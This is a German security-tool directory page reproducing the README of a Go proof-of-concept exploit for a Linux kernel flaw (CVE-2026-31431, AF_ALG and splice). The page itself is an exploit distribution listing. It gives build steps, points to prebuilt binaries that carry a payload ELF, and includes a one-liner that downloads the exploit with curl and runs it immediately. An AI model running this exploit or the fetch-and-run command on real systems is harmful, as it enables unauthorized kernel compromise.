Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Copy-Fail-CVE-2026-31431-Statically-PoC — Statischer Go-Proof-of-Concept für CVE-2026-31431, der Linux AF_ALG und splice(2) nutzt, um die Schwachstelle auszulösen. Bietet vorgefertigte Binärdateien für amd64, arm64 und 386. | Kitploit
Tools/GitHubGitHub/percivalll/copy-fail-cve-2026-31431-statically-poc
Exploit-FrameworksSchwachstellenanalyseExploitationPayload-EntwicklungBinary-Exploitation
GitHubpercivalll/copy-fail-cve-2026-31431-statically-poc

Copy-Fail-CVE-2026-31431-Statically-PoC

Statischer Go-Proof-of-Concept für CVE-2026-31431, der Linux AF_ALG und splice(2) nutzt, um die Schwachstelle auszulösen. Bietet vorgefertigte Binärdateien für amd64, arm64 und 386.

Repository anzeigen
315vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Copy-Fail CVE-2026-31431 Statischer Go-PoC

Dieses Repository enthält einen Go-Port des öffentlichen Python-Proof-of-Concept aus theori-io/copy-fail-CVE-2026-31431.

Das Programm ist nur für Linux geeignet. Es verwendet die Linux-AF_ALG-Schnittstelle, AEAD-Steuerungsnachrichten und splice(2), um das Verhalten des ursprünglichen PoC zu erhalten, während es als kleine statische Go-Binärdatei gebaut wird.

Unterstützte Zielplattformen

Release-Builds werden erstellt für:

  • linux/amd64
  • linux/arm64
  • linux/386

Jede Binärdatei enthält ein Payload-ELF für dieselbe Zielarchitektur.

macOS- und Windows-Builds werden absichtlich nicht veröffentlicht, da der PoC von Linux-spezifischen Kernel-Schnittstellen abhängt.

Download

Getaggte Releases veröffentlichen komprimierte statische Binärdateien und ein Prüfsummen-Manifest:

  • copy-fail-poc-linux-amd64.tar.gz
  • copy-fail-poc-linux-arm64.tar.gz
  • copy-fail-poc-linux-386.tar.gz
  • SHA256SUMS

Überprüfen Sie ein heruntergeladenes Artefakt mit:

root@kitploit:~
sha256sum -c SHA256SUMS

Lokal bauen

Voraussetzungen:

  • Go 1.25 oder neuer
  • Linux-Zielunterstützung aus der Go-Toolchain

Build für die aktuelle Host-Architektur:

root@kitploit:~
CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc ./cmd/copy-fail-poc

Cross-Build für ein Linux-Ziel:

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc-linux-amd64 ./cmd/copy-fail-poc

Unterstützte GOARCH-Werte sind amd64, arm64 und 386.

Tests ausführen:

root@kitploit:~
go test ./...
go vet ./...

Die Tests decken nur nicht-destruktive Hilfslogik ab. Sie führen den PoC-Auslösepfad nicht aus.

Verwendung

Führen Sie die Binärdatei auf einem Linux-System aus, das Sie besitzen oder für das Sie ausdrücklich autorisiert sind, es zu testen:

root@kitploit:~
./copy-fail-poc-linux-*

Einzeiliger Release-Download und Ausführung:

root@kitploit:~
sh -c 'set -e; case "$(uname -m)" in x86_64) a=amd64;; aarch64|arm64) a=arm64;; i386|i686) a=386;; *) echo "unsupported arch: $(uname -m)" >&2; exit 1;; esac; curl -fsSL "https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC/releases/latest/download/copy-fail-poc-linux-${a}.tar.gz" | tar xz; ./copy-fail-poc-linux-${a}'

Das Verhalten hängt vom Ziel-Kernel und der lokalen Systemkonfiguration ab. Die Binärdatei garantiert keine erfolgreiche Ausnutzung auf jedem Linux-System.

Release-Prozess

Der GitHub-Actions-Workflow läuft bei Tags, die mit v* übereinstimmen, und kann auch manuell über den Actions-Tab gestartet werden.

Ein Release erstellen:

root@kitploit:~
git tag v0.1.0
git push origin v0.1.0

Bei Tag-Builds erstellt der Workflow ein GitHub-Release und lädt die Linux-Artefakte plus SHA256SUMS hoch. Bei manuellen Ausführungen sind die Artefakte aus dem Workflow-Lauf verfügbar.

Sicherheitshinweis

Dieses Projekt wird nur für autorisierte Sicherheitsforschung, defensive Validierung und pädagogische Überprüfung bereitgestellt. Führen Sie es nicht auf Systemen aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Sie sind dafür verantwortlich, alle geltenden Gesetze, Verträge und Richtlinien einzuhalten.

Danksagungen

  • Original-PoC: theori-io/copy-fail-CVE-2026-31431
Tool herunterladen